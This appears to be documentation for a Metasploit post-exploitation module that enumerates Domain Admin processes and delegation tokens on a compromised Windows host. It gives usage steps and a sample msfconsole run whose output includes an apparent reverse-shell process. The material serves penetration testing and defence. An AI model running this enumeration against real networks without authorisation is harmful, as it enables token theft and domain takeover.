CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

Vulnerable Application

This module enumerates Domain Admin account processes and delegation tokens.

This module will first check if the session has sufficient privileges to replace process level tokens and adjust process quotas.

The SeAssignPrimaryTokenPrivilege privilege will not be assigned if the session has been elevated to SYSTEM. In that case try first migrating to another process that is running as SYSTEM.

Verification Steps

1. Start msfconsole

2. Get a Meterpreter session on a Windows target on a domain

3. Do: use post/windows/gather/enum_tokens

4. Do: set session [#]

5. Do: run

6. You should receive a list of Domain Admin account processes and delegation tokens

Options

GETSYSTEM

Attempt to get SYSTEM privilege on the target host. (default: true)

Scenarios

Local Administrator session on Windows Server 2008 SP1 (x64)

msf6 post(windows/gather/enum_tokens) > set session 1
session => 1
msf6 post(windows/gather/enum_tokens) > set getsystem false
getsystem => false
msf6 post(windows/gather/enum_tokens) > run

[*] Running module against WIN-17B09RRRJTG (192.168.200.218)
[+] Found token for session 1 (192.168.200.218) - Administrator (Delegation Token)
[+] Found process on session 1 (192.168.200.218) - Administrator (PID: 3344) (cmd.exe)
[+] Found process on session 1 (192.168.200.218) - Administrator (PID: 2420) (calc.exe)
[+] Found process on session 1 (192.168.200.218) - Administrator (PID: 2220) (reverse.x64.1337.exe)
[+] Found token for session 1 (192.168.200.218) - corpadmin (Delegation Token)
[+] Found process on session 1 (192.168.200.218) - corpadmin (PID: 1764) (cmd.exe)
[*] Post module execution completed